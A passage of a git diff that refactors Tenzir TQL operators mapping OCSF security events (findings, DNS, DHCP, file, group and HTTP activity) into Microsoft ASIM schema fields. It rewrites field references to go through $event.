"Critical" } 6 => { - asim.EventSeverity = "High" - asim.EventOriginalSeverity = ocsf.severity? else "Fatal" + $event.asim.EventSeverity = "High" + $event.asim.EventOriginalSeverity = $event.ocsf.severity? else "Fatal" } - _ if ocsf.severity? == "Critical" or ocsf.severity? == "Fatal" => { - asim.EventSeverity = "High" - asim.EventOriginalSeverity = ocsf.severity + _ if $event.ocsf.severity? == "Critical" or $event.ocsf.severity? == "Fatal" => { + $event.asim.EventSeverity = "High" + $event.asim.EventOriginalSeverity = $event.ocsf.severity } - _ if ocsf.severity? in ["Informational", "Low", "Medium", "High"] => { - asim.EventSeverity = ocsf.severity + _ if $event.ocsf.severity? in ["Informational", "Low", "Medium", "High"] => { + $event.asim.EventSeverity = $event.ocsf.severity } - _ if ocsf.severity? != null => { - asim.EventOriginalSeverity = ocsf.severity + _ if $event.ocsf.severity? != null => { + $event.asim.EventOriginalSeverity = $event.ocsf.severity } _ => {} } -match ocsf.status? { +match $event.ocsf.status? { "Success" => { - asim.EventResult = "Success" + $event.asim.EventResult = "Success" } "Failure" => { - asim.EventResult = "Failure" + $event.asim.EventResult = "Failure" } "Partial" => { - asim.EventResult = "Partial" + $event.asim.EventResult = "Partial" } _ => { - match ocsf.status_id? { - 1 if ocsf.class_uid != 2003 and ocsf.class_uid != 2004 and ocsf.class_uid != 2005 => { - asim.EventResult = "Success" + match $event.ocsf.status_id? { + 1 if $event.ocsf.class_uid != 2003 and $event.ocsf.class_uid != 2004 and $event.ocsf.class_uid != 2005 => { + $event.asim.EventResult = "Success" } 2 => { - asim.EventResult = "Failure" + $event.asim.EventResult = "Failure" } _ => { - asim.EventResult = "NA" + $event.asim.EventResult = "NA" } } } } -if ocsf.status_detail? != null { - asim.EventOriginalResultDetails = ocsf.status_detail +if $event.ocsf.status_detail? != null { + $event.asim.EventOriginalResultDetails = $event.ocsf.status_detail } -if ocsf.status_code? != null { - asim.EventOriginalResultDetails = ocsf.status_code.string() +if $event.ocsf.status_code? != null { + $event.asim.EventOriginalResultDetails = $event.ocsf.status_code.string() } -if ocsf.device?.hostname? != null { - asim.Dvc = ocsf.device.hostname - asim.DvcHostname = ocsf.device.hostname - asim.DvcFQDN = ocsf.device.hostname +if $event.ocsf.device?.hostname? != null { + $event.asim.Dvc = $event.ocsf.device.hostname + $event.asim.DvcHostname = $event.ocsf.device.hostname + $event.asim.DvcFQDN = $event.ocsf.device.hostname } -if ocsf.device?.uid? != null { - asim.DvcId = ocsf.device.uid +if $event.ocsf.device?.uid? != null { + $event.asim.DvcId = $event.ocsf.device.uid } -if ocsf.device?.ip? != null { - asim.DvcIpAddr = ocsf.device.ip - if asim.Dvc? == null { - asim.Dvc = ocsf.device.ip.string() +if $event.ocsf.device?.ip? != null { + $event.asim.DvcIpAddr = $event.ocsf.device.ip + if $event.asim.Dvc? == null { + $event.asim.Dvc = $event.ocsf.device.ip.string() } } -if asim.Dvc? == null { - asim.Dvc = asim.EventProduct +if $event.asim.Dvc? == null { + $event.asim.Dvc = $event.asim.EventProduct } -if ocsf.disposition? != null { - asim.DvcAction = ocsf.disposition +if $event.ocsf.disposition? != null { + $event.asim.DvcAction = $event.ocsf.disposition } -if ocsf.action? != null { - asim.DvcAction = ocsf.action +if $event.ocsf.action? != null { + $event.asim.DvcAction = $event.ocsf.action } diff --git a/microsoft/operators/asim/ocsf/compliance_finding.tql b/microsoft/operators/asim/ocsf/compliance_finding.tql index 901f1e2..1c5e35b 100644 --- a/microsoft/operators/asim/ocsf/compliance_finding.tql +++ b/microsoft/operators/asim/ocsf/compliance_finding.tql @@ -7,43 +7,43 @@ args: type: field --- -assert $event.class_uid == 2003 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 2003 -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.alert_event" -asim.EventSchema = "AlertEvent" -asim.EventSchemaVersion = "0.1" -asim.EventType = "Alert" -asim.EventUid = ocsf.finding_info?.uid? else ocsf.metadata?.original_event_uid? +$event.asim.EventSchema = "AlertEvent" +$event.asim.EventSchemaVersion = "0.1" +$event.asim.EventType = "Alert" +$event.asim.EventUid = $event.ocsf.finding_info?.uid? else $event.ocsf.metadata?.original_event_uid? -asim.AlertName = ocsf.finding_info?.title? else ocsf.message? -asim.EventReportUrl = ocsf.finding_info?.url? -asim.EventSubType = "Compliance Violation" -asim.ThreatName = ocsf.malware?[0]?.name? else ocsf.finding_info?.title? -asim.ThreatCategory = "Security Policy Violation" -asim.ThreatOriginalCategory = ocsf.finding_info?.types?[0]? -asim.Username = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? -asim.UserId = ocsf.user?.uid? else ocsf.actor?.user?.uid? -asim.UserIdType = "SID" if asim.UserId?.starts_with("S-") == true -match ocsf.status? { +$event.asim.AlertName = $event.ocsf.finding_info?.title? else $event.ocsf.message? +$event.asim.EventReportUrl = $event.ocsf.finding_info?.url? +$event.asim.EventSubType = "Compliance Violation" +$event.asim.ThreatName = $event.ocsf.malware?[0]?.name? else $event.ocsf.finding_info?.title? +$event.asim.ThreatCategory = "Security Policy Violation" +$event.asim.ThreatOriginalCategory = $event.ocsf.finding_info?.types?[0]? +$event.asim.Username = $event.ocsf.user?.email_addr? else $event.ocsf.user?.name? else $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? +$event.asim.UserId = $event.ocsf.user?.uid? else $event.ocsf.actor?.user?.uid? +$event.asim.UserIdType = "SID" if $event.asim.UserId?.starts_with("S-") == true +match $event.ocsf.status? { "New" | "Active" | "In Progress" => { - asim.AlertStatus = "Active" + $event.asim.AlertStatus = "Active" } "Resolved" | "Closed" => { - asim.AlertStatus = "Closed" + $event.asim.AlertStatus = "Closed" } _ => {} } -asim.AlertOriginalStatus = ocsf.status? -match ocsf.verdict? { - "True Positive" => { asim.AlertVerdict = "True Positive" } - "False Positive" => { asim.AlertVerdict = "False Positive" } - "Benign" => { asim.AlertVerdict = "Benign Positive" } - "Unknown" => { asim.AlertVerdict = "Unknown" } +$event.asim.AlertOriginalStatus = $event.ocsf.status? +match $event.ocsf.verdict? { + "True Positive" => { $event.asim.AlertVerdict = "True Positive"} + "False Positive" => { $event.asim.AlertVerdict = "False Positive"} + "Benign" => { $event.asim.AlertVerdict = "Benign Positive"} + "Unknown" => { $event.asim.AlertVerdict = "Unknown"} _ => {} } -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/asim/ocsf/detection_finding.tql b/microsoft/operators/asim/ocsf/detection_finding.tql index 4721bdb..84a4edc 100644 --- a/microsoft/operators/asim/ocsf/detection_finding.tql +++ b/microsoft/operators/asim/ocsf/detection_finding.tql @@ -7,9 +7,9 @@ args: type: field --- -assert $event.class_uid == 2004 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 2004 let $threat_categories = { adware: "Adware", @@ -26,39 +26,39 @@ let $threat_categories = { worm: "Worm", } -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.alert_event" -asim.EventSchema = "AlertEvent" -asim.EventSchemaVersion = "0.1" -asim.EventType = "Alert" -asim.EventUid = ocsf.finding_info?.uid? else ocsf.metadata?.original_event_uid? +$event.asim.EventSchema = "AlertEvent" +$event.asim.EventSchemaVersion = "0.1" +$event.asim.EventType = "Alert" +$event.asim.EventUid = $event.ocsf.finding_info?.uid? else $event.ocsf.metadata?.original_event_uid? -asim.AlertName = ocsf.finding_info?.title? else ocsf.message? -asim.EventReportUrl = ocsf.finding_info?.url? -asim.EventSubType = "Threat" -asim.ThreatName = ocsf.malware?[0]?.name? else ocsf.finding_info?.title? -asim.ThreatCategory = $threat_categories[ocsf.finding_info?.types?[0]?.to_lower()]? -asim.ThreatOriginalCategory = ocsf.finding_info?.types?[0]? -asim.Username = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? -asim.UserId = ocsf.user?.uid? else ocsf.actor?.user?.uid? -asim.UserIdType = "SID" if asim.UserId?.starts_with("S-") == true -match ocsf.status? { +$event.asim.AlertName = $event.ocsf.finding_info?.title? else $event.ocsf.message? +$event.asim.EventReportUrl = $event.ocsf.finding_info?.url? +$event.asim.EventSubType = "Threat" +$event.asim.ThreatName = $event.ocsf.malware?[0]?.name? else $event.ocsf.finding_info?.title? +$event.asim.ThreatCategory = $threat_categories[$event.ocsf.finding_info?.types?[0]?.to_lower()]? +$event.asim.ThreatOriginalCategory = $event.ocsf.finding_info?.types?[0]? +$event.asim.Username = $event.ocsf.user?.email_addr? else $event.ocsf.user?.name? else $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? +$event.asim.UserId = $event.ocsf.user?.uid? else $event.ocsf.actor?.user?.uid? +$event.asim.UserIdType = "SID" if $event.asim.UserId?.starts_with("S-") == true +match $event.ocsf.status? { "New" | "Active" | "In Progress" => { - asim.AlertStatus = "Active" + $event.asim.AlertStatus = "Active" } "Resolved" | "Closed" => { - asim.AlertStatus = "Closed" + $event.asim.AlertStatus = "Closed" } _ => {} } -asim.AlertOriginalStatus = ocsf.status? -match ocsf.verdict? { - "True Positive" => { asim.AlertVerdict = "True Positive" } - "False Positive" => { asim.AlertVerdict = "False Positive" } - "Benign" => { asim.AlertVerdict = "Benign Positive" } - "Unknown" => { asim.AlertVerdict = "Unknown" } +$event.asim.AlertOriginalStatus = $event.ocsf.status? +match $event.ocsf.verdict? { + "True Positive" => { $event.asim.AlertVerdict = "True Positive"} + "False Positive" => { $event.asim.AlertVerdict = "False Positive"} + "Benign" => { $event.asim.AlertVerdict = "Benign Positive"} + "Unknown" => { $event.asim.AlertVerdict = "Unknown"} _ => {} } -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/asim/ocsf/dhcp_activity.tql b/microsoft/operators/asim/ocsf/dhcp_activity.tql index 8f0c046..dd5c959 100644 --- a/microsoft/operators/asim/ocsf/dhcp_activity.tql +++ b/microsoft/operators/asim/ocsf/dhcp_activity.tql @@ -7,23 +7,23 @@ args: type: field --- -assert $event.class_uid == 4004 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 4004 -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.dhcp_event" -asim.EventSchema = "DhcpEvent" -asim.EventSchemaVersion = "0.1.1" -match ocsf.activity_name { - "Ack" | "Offer" => { asim.EventType = "Assign" } - "Request" => { asim.EventType = "Renew" } - "Release" => { asim.EventType = "Release" } - _ => { asim.EventType = "Assign" } +$event.asim.EventSchema = "DhcpEvent" +$event.asim.EventSchemaVersion = "0.1.1" +match $event.ocsf.activity_name { + "Ack" | "Offer" => { $event.asim.EventType = "Assign"} + "Request" => { $event.asim.EventType = "Renew"} + "Release" => { $event.asim.EventType = "Release"} + _ => { $event.asim.EventType = "Assign"} } -asim.SrcHostname = ocsf.src_endpoint?.hostname? else ocsf.src_endpoint?.ip?.string() -asim.SrcIpAddr = ocsf.src_endpoint?.ip? -asim.SrcMacAddr = ocsf.src_endpoint?.mac? +$event.asim.SrcHostname = $event.ocsf.src_endpoint?.hostname? else $event.ocsf.src_endpoint?.ip?.string() +$event.asim.SrcIpAddr = $event.ocsf.src_endpoint?.ip? +$event.asim.SrcMacAddr = $event.ocsf.src_endpoint?.mac? -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/asim/ocsf/dns_activity.tql b/microsoft/operators/asim/ocsf/dns_activity.tql index 8f3a986..047dd04 100644 --- a/microsoft/operators/asim/ocsf/dns_activity.tql +++ b/microsoft/operators/asim/ocsf/dns_activity.tql @@ -7,28 +7,28 @@ args: type: field --- -assert $event.class_uid == 4003 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 4003 -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.dns" -asim.EventSchema = "Dns" -asim.EventSchemaVersion = "0.1.7" -asim.EventType = ocsf.query?.opcode? else "Query" -match ocsf.activity_name { - "Query" => { asim.EventSubType = "request" } - "Response" => { asim.EventSubType = "response" } +$event.asim.EventSchema = "Dns" +$event.asim.EventSchemaVersion = "0.1.7" +$event.asim.EventType = $event.ocsf.query?.opcode? else "Query" +match $event.ocsf.activity_name { + "Query" => { $event.asim.EventSubType = "request"} + "Response" => { $event.asim.EventSubType = "response"} _ => {} } -asim.DnsQuery = ocsf.query?.hostname? -asim.DnsQueryTypeName = ocsf.query?.type? -asim.DnsQueryClassName = ocsf.query?.class? -asim.EventResultDetails = ocsf.rcode? else "NA" -asim.SrcIpAddr = ocsf.src_endpoint?.ip? -asim.SrcHostname = ocsf.src_endpoint?.hostname? -asim.DstIpAddr = ocsf.dst_endpoint?.ip? -asim.DstHostname = ocsf.dst_endpoint?.hostname? +$event.asim.DnsQuery = $event.ocsf.query?.hostname? +$event.asim.DnsQueryTypeName = $event.ocsf.query?.type? +$event.asim.DnsQueryClassName = $event.ocsf.query?.class? +$event.asim.EventResultDetails = $event.ocsf.rcode? else "NA" +$event.asim.SrcIpAddr = $event.ocsf.src_endpoint?.ip? +$event.asim.SrcHostname = $event.ocsf.src_endpoint?.hostname? +$event.asim.DstIpAddr = $event.ocsf.dst_endpoint?.ip? +$event.asim.DstHostname = $event.ocsf.dst_endpoint?.hostname? -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/asim/ocsf/entity_management.tql b/microsoft/operators/asim/ocsf/entity_management.tql index 96d4d1c..fff7f60 100644 --- a/microsoft/operators/asim/ocsf/entity_management.tql +++ b/microsoft/operators/asim/ocsf/entity_management.tql @@ -7,42 +7,42 @@ args: type: field --- -assert $event.class_uid == 3004 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 3004 -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.audit_event" -asim.EventSchema = "AuditEvent" -asim.EventSchemaVersion = "0.1.2" -asim.EventType = "Other" -match ocsf.activity_name { - "Create" => { asim.EventType = "Create" } - "Read" => { asim.EventType = "Read" } - "Update" | "Set" => { asim.EventType = "Set" } - "Delete" => { asim.EventType = "Delete" } - "Execute" => { asim.EventType = "Execute" } - "Install" => { asim.EventType = "Install" } - "Clear" => { asim.EventType = "Clear" } - "Enable" => { asim.EventType = "Enable" } - "Disable" => { asim.EventType = "Disable" } - "Start" => { asim.EventType = "Start" } - "Stop" => { asim.EventType = "Stop" } +$event.asim.EventSchema = "AuditEvent" +$event.asim.EventSchemaVersion = "0.1.2" +$event.asim.EventType = "Other" +match $event.ocsf.activity_name { + "Create" => { $event.asim.EventType = "Create"} + "Read" => { $event.asim.EventType = "Read"} + "Update" | "Set" => { $event.asim.EventType = "Set"} + "Delete" => { $event.asim.EventType = "Delete"} + "Execute" => { $event.asim.EventType = "Execute"} + "Install" => { $event.asim.EventType = "Install"} + "Clear" => { $event.asim.EventType = "Clear"} + "Enable" => { $event.asim.EventType = "Enable"} + "Disable" => { $event.asim.EventType = "Disable"} + "Start" => { $event.asim.EventType = "Start"} + "Stop" => { $event.asim.EventType = "Stop"} _ => {} } -asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType -asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path? -asim.ObjectType = "Directory Service Object" -asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? -if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { - asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" - asim.ActorUsernameType = "Windows" +$event.asim.Operation = $event.ocsf.activity_name? else $event.ocsf.type_name? else $event.asim.EventType +$event.asim.Object = $event.ocsf.job?.name? else $event.ocsf.log_name? else $event.ocsf.metadata?.log_name? else $event.ocsf.entity?.name? else $event.ocsf.entity?.uid? else $event.ocsf.win_service?.name? else $event.ocsf.win_service?.service_file?.path? +$event.asim.ObjectType = "Directory Service Object" +$event.asim.ActorUsername = $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? else $event.ocsf.actor?.user?.uid? else $event.ocsf.actor?.app_name? else $event.ocsf.actor?.app_uid? +if $event.ocsf.actor?.user?.domain? != null and $event.ocsf.actor?.user?.name? != null { + $event.asim.ActorUsername = f"{$event.ocsf.actor.user.domain}\\{$event.ocsf.actor.user.name}" + $event.asim.ActorUsernameType = "Windows" } -asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true -asim.SrcIpAddr = ocsf.src_endpoint?.ip? -asim.TargetHostname = ocsf.dst_endpoint?.hostname? -asim.TargetIpAddr = ocsf.dst_endpoint?.ip? +$event.asim.ActorUserId = $event.ocsf.actor?.user?.uid? +$event.asim.ActorUserIdType = "SID" if $event.asim.ActorUserId?.starts_with("S-") == true +$event.asim.SrcIpAddr = $event.ocsf.src_endpoint?.ip? +$event.asim.TargetHostname = $event.ocsf.dst_endpoint?.hostname? +$event.asim.TargetIpAddr = $event.ocsf.dst_endpoint?.ip? -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/asim/ocsf/event_log_activity.tql b/microsoft/operators/asim/ocsf/event_log_activity.tql index 8b5f78d..2fe1d92 100644 --- a/microsoft/operators/asim/ocsf/event_log_activity.tql +++ b/microsoft/operators/asim/ocsf/event_log_activity.tql @@ -7,42 +7,42 @@ args: type: field --- -assert $event.class_uid == 1008 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 1008 -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.audit_event" -asim.EventSchema = "AuditEvent" -asim.EventSchemaVersion = "0.1.2" -asim.EventType = "Other" -match ocsf.activity_name { - "Create" => { asim.EventType = "Create" } - "Read" => { asim.EventType = "Read" } - "Update" | "Set" => { asim.EventType = "Set" } - "Delete" => { asim.EventType = "Delete" } - "Execute" => { asim.EventType = "Execute" } - "Install" => { asim.EventType = "Install" } - "Clear" => { asim.EventType = "Clear" } - "Enable" => { asim.EventType = "Enable" } - "Disable" => { asim.EventType = "Disable" } - "Start" => { asim.EventType = "Start" } - "Stop" => { asim.EventType = "Stop" } +$event.asim.EventSchema = "AuditEvent" +$event.asim.EventSchemaVersion = "0.1.2" +$event.asim.EventType = "Other" +match $event.ocsf.activity_name { + "Create" => { $event.asim.EventType = "Create"} + "Read" => { $event.asim.EventType = "Read"} + "Update" | "Set" => { $event.asim.EventType = "Set"} + "Delete" => { $event.asim.EventType = "Delete"} + "Execute" => { $event.asim.EventType = "Execute"} + "Install" => { $event.asim.EventType = "Install"} + "Clear" => { $event.asim.EventType = "Clear"} + "Enable" => { $event.asim.EventType = "Enable"} + "Disable" => { $event.asim.EventType = "Disable"} + "Start" => { $event.asim.EventType = "Start"} + "Stop" => { $event.asim.EventType = "Stop"} _ => {} } -asim.Operation = ocsf.activity_name? else ocsf.type_name? else asim.EventType -asim.Object = ocsf.job?.name? else ocsf.log_name? else ocsf.metadata?.log_name? else ocsf.entity?.name? else ocsf.entity?.uid? else ocsf.win_service?.name? else ocsf.win_service?.service_file?.path? -asim.ObjectType = "Event Log" -asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? -if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { - asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" - asim.ActorUsernameType = "Windows" +$event.asim.Operation = $event.ocsf.activity_name? else $event.ocsf.type_name? else $event.asim.EventType +$event.asim.Object = $event.ocsf.job?.name? else $event.ocsf.log_name? else $event.ocsf.metadata?.log_name? else $event.ocsf.entity?.name? else $event.ocsf.entity?.uid? else $event.ocsf.win_service?.name? else $event.ocsf.win_service?.service_file?.path? +$event.asim.ObjectType = "Event Log" +$event.asim.ActorUsername = $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? else $event.ocsf.actor?.user?.uid? else $event.ocsf.actor?.app_name? else $event.ocsf.actor?.app_uid? +if $event.ocsf.actor?.user?.domain? != null and $event.ocsf.actor?.user?.name? != null { + $event.asim.ActorUsername = f"{$event.ocsf.actor.user.domain}\\{$event.ocsf.actor.user.name}" + $event.asim.ActorUsernameType = "Windows" } -asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true -asim.SrcIpAddr = ocsf.src_endpoint?.ip? -asim.TargetHostname = ocsf.dst_endpoint?.hostname? -asim.TargetIpAddr = ocsf.dst_endpoint?.ip? +$event.asim.ActorUserId = $event.ocsf.actor?.user?.uid? +$event.asim.ActorUserIdType = "SID" if $event.asim.ActorUserId?.starts_with("S-") == true +$event.asim.SrcIpAddr = $event.ocsf.src_endpoint?.ip? +$event.asim.TargetHostname = $event.ocsf.dst_endpoint?.hostname? +$event.asim.TargetIpAddr = $event.ocsf.dst_endpoint?.ip? -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/asim/ocsf/file_system_activity.tql b/microsoft/operators/asim/ocsf/file_system_activity.tql index c271c3b..65209f3 100644 --- a/microsoft/operators/asim/ocsf/file_system_activity.tql +++ b/microsoft/operators/asim/ocsf/file_system_activity.tql @@ -7,38 +7,38 @@ args: type: field --- -assert $event.class_uid == 1001 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 1001 -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.file_event" -asim.EventSchema = "FileEvent" -asim.EventSchemaVersion = "0.2.2" -match ocsf.activity_name { - "Create" => { asim.EventType = "FileCreated" } - "Read" | "Open" => { asim.EventType = "FileAccessed" } - "Update" | "Set Attributes" | "Set Security" => { asim.EventType = "FileModified" } - "Delete" => { asim.EventType = "FileDeleted" } - "Rename" => { asim.EventType = "FileRenamed" } - _ => { asim.EventType = "FileCreatedOrModified" } +$event.asim.EventSchema = "FileEvent" +$event.asim.EventSchemaVersion = "0.2.2" +match $event.ocsf.activity_name { + "Create" => { $event.asim.EventType = "FileCreated"} + "Read" | "Open" => { $event.asim.EventType = "FileAccessed"} + "Update" | "Set Attributes" | "Set Security" => { $event.asim.EventType = "FileModified"} + "Delete" => { $event.asim.EventType = "FileDeleted"} + "Rename" => { $event.asim.EventType = "FileRenamed"} + _ => { $event.asim.EventType = "FileCreatedOrModified"} } -asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? -if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { - asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" - asim.ActorUsernameType = "Windows" +$event.asim.ActorUsername = $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? else $event.ocsf.actor?.user?.uid? +if $event.ocsf.actor?.user?.domain? != null and $event.ocsf.actor?.user?.name? != null { + $event.asim.ActorUsername = f"{$event.ocsf.actor.user.domain}\\{$event.ocsf.actor.user.name}" + $event.asim.ActorUsernameType = "Windows" } -asim.ActorUserId = ocsf.actor?.user?.uid? -asim.TargetFilePath = ocsf.file?.path? else ocsf.file?.name? -asim.TargetFileName = ocsf.file?.name? else asim.TargetFilePath?.split("\\")[-1] -if ocsf.activity_name == "Rename" and ocsf.file_result? != null { - asim.SrcFilePath = asim.TargetFilePath - asim.SrcFileName = asim.TargetFileName - asim.SrcFilePathType = "Windows Local" if asim.SrcFilePath?.contains("\\") == true else "Unix Local" - asim.TargetFilePath = ocsf.file_result.path? else asim.TargetFilePath - asim.TargetFileName = ocsf.file_result.name? else asim.TargetFileName +$event.asim.ActorUserId = $event.ocsf.actor?.user?.uid? +$event.asim.TargetFilePath = $event.ocsf.file?.path? else $event.ocsf.file?.name? +$event.asim.TargetFileName = $event.ocsf.file?.name? else $event.asim.TargetFilePath?.split("\\")[-1] +if $event.ocsf.activity_name == "Rename" and $event.ocsf.file_result? != null { + $event.asim.SrcFilePath = $event.asim.TargetFilePath + $event.asim.SrcFileName = $event.asim.TargetFileName + $event.asim.SrcFilePathType = "Windows Local" if $event.asim.SrcFilePath?.contains("\\") == true else "Unix Local" + $event.asim.TargetFilePath = $event.ocsf.file_result.path? else $event.asim.TargetFilePath + $event.asim.TargetFileName = $event.ocsf.file_result.name? else $event.asim.TargetFileName } -asim.TargetFilePathType = "Windows Local" if asim.TargetFilePath?.contains("\\") == true else "Unix Local" +$event.asim.TargetFilePathType = "Windows Local" if $event.asim.TargetFilePath?.contains("\\") == true else "Unix Local" -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/asim/ocsf/group_management.tql b/microsoft/operators/asim/ocsf/group_management.tql index 5213151..f1cf08d 100644 --- a/microsoft/operators/asim/ocsf/group_management.tql +++ b/microsoft/operators/asim/ocsf/group_management.tql @@ -7,44 +7,44 @@ args: type: field --- -assert $event.class_uid == 3006 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 3006 -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.user_management" -asim.EventSchema = "UserManagement" -asim.EventSchemaVersion = "0.1.2" -asim.EventSeverity = asim.EventSeverity? else "Informational" -asim.ActorUsername = ocsf.actor?.user?.email_addr? else ocsf.actor?.user?.name? else ocsf.actor?.user?.uid? else ocsf.actor?.app_name? else ocsf.actor?.app_uid? -if ocsf.actor?.user?.domain? != null and ocsf.actor?.user?.name? != null { - asim.ActorUsername = f"{ocsf.actor.user.domain}\\{ocsf.actor.user.name}" - asim.ActorUsernameType = "Windows" +$event.asim.EventSchema = "UserManagement" +$event.asim.EventSchemaVersion = "0.1.2" +$event.asim.EventSeverity = $event.asim.EventSeverity? else "Informational" +$event.asim.ActorUsername = $event.ocsf.actor?.user?.email_addr? else $event.ocsf.actor?.user?.name? else $event.ocsf.actor?.user?.uid? else $event.ocsf.actor?.app_name? else $event.ocsf.actor?.app_uid? +if $event.ocsf.actor?.user?.domain? != null and $event.ocsf.actor?.user?.name? != null { + $event.asim.ActorUsername = f"{$event.ocsf.actor.user.domain}\\{$event.ocsf.actor.user.name}" + $event.asim.ActorUsernameType = "Windows" } -asim.ActorUserId = ocsf.actor?.user?.uid? -asim.ActorUserIdType = "SID" if asim.ActorUserId?.starts_with("S-") == true +$event.asim.ActorUserId = $event.ocsf.actor?.user?.uid? +$event.asim.ActorUserIdType = "SID" if $event.asim.ActorUserId?.starts_with("S-") == true -match ocsf.activity_name { - "Create" => { asim.EventType = "GroupCreated" } - "Delete" => { asim.EventType = "GroupDeleted" } - "Add User" => { asim.EventType = "UserAddedToGroup" } - "Remove User" => { asim.EventType = "UserRemovedFromGroup" } - "Read" => { asim.EventType = "GroupRead" } - _ => { asim.EventType = "GroupModified" } +match $event.ocsf.activity_name { + "Create" => { $event.asim.EventType = "GroupCreated"} + "Delete" => { $event.asim.EventType = "GroupDeleted"} + "Add User" => { $event.asim.EventType = "UserAddedToGroup"} + "Remove User" => { $event.asim.EventType = "UserRemovedFromGroup"} + "Read" => { $event.asim.EventType = "GroupRead"} + _ => { $event.asim.EventType = "GroupModified"} } -asim.TargetUsername = ocsf.user?.email_addr? else ocsf.user?.name? else ocsf.user?.uid? -if ocsf.user?.domain? != null and ocsf.user?.name? != null { - asim.TargetUsername = f"{ocsf.user.domain}\\{ocsf.user.name}" - asim.TargetUsernameType = "Windows" +$event.asim.TargetUsername = $event.ocsf.user?.email_addr? else $event.ocsf.user?.name? else $event.ocsf.user?.uid? +if $event.ocsf.user?.domain? != null and $event.ocsf.user?.name? != null { + $event.asim.TargetUsername = f"{$event.ocsf.user.domain}\\{$event.ocsf.user.name}" + $event.asim.TargetUsernameType = "Windows" } -asim.TargetUserId = ocsf.user?.uid? -asim.TargetUserIdType = "SID" if asim.TargetUserId?.starts_with("S-") == true -asim.GroupName = ocsf.group?.name? -asim.GroupId = ocsf.group?.uid? -asim.GroupIdType = "SID" if asim.GroupId?.starts_with("S-") == true -asim.SrcIpAddr = ocsf.src_endpoint?.ip? -asim.SrcHostname = ocsf.src_endpoint?.hostname? +$event.asim.TargetUserId = $event.ocsf.user?.uid? +$event.asim.TargetUserIdType = "SID" if $event.asim.TargetUserId?.starts_with("S-") == true +$event.asim.GroupName = $event.ocsf.group?.name? +$event.asim.GroupId = $event.ocsf.group?.uid? +$event.asim.GroupIdType = "SID" if $event.asim.GroupId?.starts_with("S-") == true +$event.asim.SrcIpAddr = $event.ocsf.src_endpoint?.ip? +$event.asim.SrcHostname = $event.ocsf.src_endpoint?.hostname? -$event = move asim +$event = move $event.asim diff --git a/microsoft/operators/asim/ocsf/http_activity.tql b/microsoft/operators/asim/ocsf/http_activity.tql index 8fa63bd..abe484e 100644 --- a/microsoft/operators/asim/ocsf/http_activity.tql +++ b/microsoft/operators/asim/ocsf/http_activity.tql @@ -7,21 +7,21 @@ args: type: field --- -assert $event.class_uid == 4002 +$event = {...$event, ocsf: $event, asim: {}} -ocsf = $event +assert $event.ocsf.class_uid == 4002 -microsoft::asim::ocsf::common +microsoft::asim::ocsf::common event=$event @name = "asim.web_session" -asim.EventSchema = "WebSession" -asim.EventSchemaVersion = "0.2.7" -asim.EventType = "HTTPsession" -asim.Url = ocsf.http_request?.url?.url_string? -asim.HttpRequestMethod = ocsf.http_request?.http_method? else ocsf.activity_name?.to_upper() 